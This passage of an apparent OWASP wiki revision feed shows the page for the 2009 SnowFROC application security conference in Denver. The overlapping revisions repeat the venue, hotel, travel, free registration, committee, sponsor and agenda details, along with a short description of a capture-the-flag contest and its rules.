Venue: [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP has negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Map].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the Tivoli.  Parking validation will be provided for registered SnowFROC participants.&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56136</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56136"/>
				<updated>2009-03-04T23:24:14Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Capture the Flag (CTF)==&lt;br /&gt;
&lt;br /&gt;
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. &lt;br /&gt;
&lt;br /&gt;
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called &amp;quot;flags&amp;quot;.)  Enter a flag into the scoreboard and you're credited with the point value for that challenge.&lt;br /&gt;
&lt;br /&gt;
An entrant can be a team or an individual.  Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights.  Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.&lt;br /&gt;
&lt;br /&gt;
Thanks to:&lt;br /&gt;
&lt;br /&gt;
*IBM for sponsoring this event and providing technical support.&lt;br /&gt;
*Dan Guido and the rest of the team of students from Polytechnic University for developing the code the contest is based on. (this CTF is a modified version of the one they presented at OWASP NYC 2008)&lt;br /&gt;
&lt;br /&gt;
===CTF Rules===&lt;br /&gt;
&lt;br /&gt;
1. Don't attack other players.  The contest is about finding and exploiting vulnerabilities in the applications provided.  (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)&lt;br /&gt;
&lt;br /&gt;
2. Don't attack the infrastructure.  Networks, routers, and the scoreboard are all off-limits as targets of attack.&lt;br /&gt;
&lt;br /&gt;
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP has negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Map].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the Tivoli.  Parking validation will be provided for registered SnowFROC participants.&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56111</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56111"/>
				<updated>2009-03-04T19:04:57Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
